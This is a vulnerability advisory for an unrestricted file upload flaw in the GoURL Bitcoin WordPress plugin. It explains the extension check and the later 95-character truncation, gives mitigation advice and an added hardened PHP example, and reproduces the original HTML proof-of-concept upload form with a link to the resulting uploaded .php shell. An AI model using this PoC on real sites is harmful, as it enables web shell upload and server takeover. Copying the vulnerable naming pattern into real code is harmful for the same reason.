Vendor: GoURL Bitcoin Wordpress Plugin
By: pouyadarabi
CVSS: 7.5 (HIGH)
CWE: 434 (Unrestricted Upload)
Product Name: GoURL Bitcoin Wordpress Plugin
Affected Version From: GoURL Bitcoin Wordpress Plugin prior to version 8aa17068d7ba31a05f66e0ab2bbb55efb0f60017
Affected Version To: GoURL Bitcoin Wordpress Plugin prior to version 8aa17068d7ba31a05f66e0ab2bbb55efb0f60017
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
Year: 2020

GoURL Unrestricted Upload Vulnerability POC

GoURL Unrestricted Upload Vulnerability POC is a proof of concept for an unrestricted file upload vulnerability (CWE-434) in the GoURL Bitcoin Wordpress Plugin. The vulnerable function is located at https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637. The upload handler checks the file extension first and only afterwards takes a substring of the file name to keep its first 95 letters, so the stored name can end in a different extension than the one that was checked: a name whose first 95 characters end in .php but whose full name ends in an allowed image extension (the PoC below uses .php.jpg) passes the check and is written to disk with a .php extension. To exploit this vulnerability, an attacker must create a file with such a name and upload it to the target WordPress website through the plugin's upload form. The uploaded file can then be accessed via a link such as http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.

Mitigation:

To mitigate this vulnerability, update the GoURL Bitcoin Wordpress Plugin to a patched version (a patch exists) in which the file name is no longer cut to its first 95 letters after the extension check, so that the name stored on disk keeps the extension that was validated.
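The ordering bug described above, shown as an added PHP example next to a hardened version. This is not the plugin's own code: the allowlist, the function names and the sanitisation rule are assumptions; only the 95-character truncation and the .php.jpg naming trick come from the page.

```php
<?php
// Added example, not code from gourl.php. It models the pattern the advisory
// describes: the extension is checked on the full upload name, then the name
// is cut to 95 characters before being stored.

const MAX_NAME_LEN = 95;                              // truncation length named on the page
const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif'];   // assumed image allowlist (not the plugin's)

// Vulnerable ordering: allowlist check on the ORIGINAL name, truncation afterwards.
// The stored name may therefore end in an extension that was never checked.
function vulnerable_store_name(string $name): ?string
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;                                  // rejected by the allowlist
    }
    return substr($name, 0, MAX_NAME_LEN);            // ".php.jpg" tail loses its ".jpg"
}

// Hardened ordering: validate the extension once, sanitise and truncate only the
// base name, then re-append the validated extension. The stored name cannot
// change type, whatever the length of the original name.
function hardened_store_name(string $name): ?string
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $base = pathinfo($name, PATHINFO_FILENAME);
    $base = preg_replace('/[^A-Za-z0-9_-]/', '_', $base);   // assumed rule: dots become underscores
    $base = substr($base, 0, MAX_NAME_LEN - strlen($ext) - 1);
    return $base . '.' . $ext;
}

// Constructed input with the PoC's shape: a base long enough that the
// 95-character cut lands right after ".php", followed by ".jpg".
$poc = str_repeat('x', 91) . '.php.jpg';

printf("vulnerable: %s\n", vulnerable_store_name($poc) ?? 'rejected');
printf("hardened:   %s\n", hardened_store_name($poc) ?? 'rejected');
```

Running it shows the vulnerable function storing a name that ends in .php while the hardened one keeps the .jpg extension that was actually validated.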

Exploit-DB raw data:

<html>
    <!--

        GoURL Unrestricted Upload Vulnerability POC by @pouyadarabi
        CWE-434

        Vulnerable Function: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637

        Details:

          After checking the file extension, a substring of the file name is used to select the first 95 letters (line #5655).
          So entering a file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
          will upload a file with a .php extension to the website :)

    -->

<body>

    <!--

        Replace http://127.0.0.1/wp/ with target wordpress website
        Fill id param in form action to any active download product

    -->

    <form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">

        <input type="file" name="gourlimage2" />
        <input type="submit"/>
        
    </form>

    <a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>

</body>

</html>